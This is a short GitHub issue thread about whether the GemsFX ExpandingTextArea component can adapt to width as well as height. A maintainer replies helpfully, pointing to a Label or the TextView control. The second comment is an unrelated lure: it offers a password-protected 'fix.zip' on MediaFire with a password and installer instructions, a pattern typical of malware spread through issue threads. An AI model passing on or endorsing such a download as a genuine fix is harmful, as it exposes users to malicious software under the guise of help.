### ISSUE TITLE
ExpandingTextArea component, width adaptive

### ISSUE THREAD

**Issue by ljy1058318852** [dlsc-software-consulting-gmbh/GemsFX#201]
The expandingTextArea component is currently mainly designed to adapt to text height growth. Can it adapt to text width growth? Just like when answering chatGPT, I need to dynamically increase or decrease the width and height of the answer content simultaneously

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dlemmermann** [comment]
You should put that in a Label and not a TextArea. If it is the selection support that you need then you can use the TextView control that we recently added to GemsFX.
